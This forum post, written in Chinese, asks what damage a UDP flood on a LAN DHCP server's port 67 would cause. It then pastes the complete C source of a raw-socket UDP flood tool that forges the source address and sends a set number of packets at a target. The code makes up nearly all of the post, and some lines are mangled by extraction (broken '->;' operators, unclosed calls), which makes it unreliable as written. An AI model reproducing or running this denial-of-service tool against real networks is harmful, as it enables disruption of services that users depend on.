- 论坛徽章:
- 0
|
假如在一个局域网内,有一台DHCP server. 有人用udp flood程序攻击这台server的67udp 端口,会有多大的后果?网络会瘫痪吗?
以下是那个udp flood的源程序.
#include<sys/types.h>;
#include<sys/socket.h>;
#include<netinet/in_systm.h>;
#include<netinet/in.h>;
#include<netinet/ip.h>;
#include<netinet/udp.h>;
#include<errno.h>;
#include<string.h>;
#include<netdb.h>;
#include<arpa/inet.h>;
#include<stdio.h>;
struct sockaddr sa;
main(int argc,char **argv)
{
int fd;
int x=1;
struct sockaddr_in *p;
struct hostent *he;
int numpackets;
u_char gram[38]=
{
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0x00, 0x12, 0x00, 0x00,
'1','2','3','4','5','6','7','8','9','0'
};
if(argc!=4)
{
fprintf(stderr,"usage: %s sourcename destinationname numpackets\n",*argv);
exit(1);
};
numpackets = atoi(argv[3]);
fprintf(stderr,"Will flood %d times",numpackets);
if((he=gethostbyname(argv[1]))==NULL)
{
fprintf(stderr,"can't resolve source hostname\n" ;
exit(1);
};
bcopy(*(he->;h_addr_list),(gram+12),4);
if((he=gethostbyname(argv[2]))==NULL)
{
fprintf(stderr,"can't resolve destination hostname\n" ;
exit(1);
};
bcopy(*(he->;h_addr_list),(gram+16),4);
*(u_short*)(gram+20)=htons((u_short)7);
*(u_short*)(gram+22)=htons((u_short)7);
p=(struct sockaddr_in*)&
p->;sin_family=AF_INET;
bcopy(*(he->;h_addr_list),&(p->;sin_addr),sizeof(struct in_addr));
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
{
perror("socket" ;
exit(1);
};
#ifdef IP_HDRINCL
fprintf(stderr,"\nWe have IP_HDRINCL \n\n" ;
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL" ;
exit(1);
};
#else
fprintf(stderr,"\nWe don't have IP_HDRINCL \n\n" ;
#endif
printf("\nNumber of Packets sent:\n\n" ;
for(x=0;x<numpackets;x++)
{
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
{
perror("sendto" ;
exit(1);
};
printf("%d ",x);
}
} |
|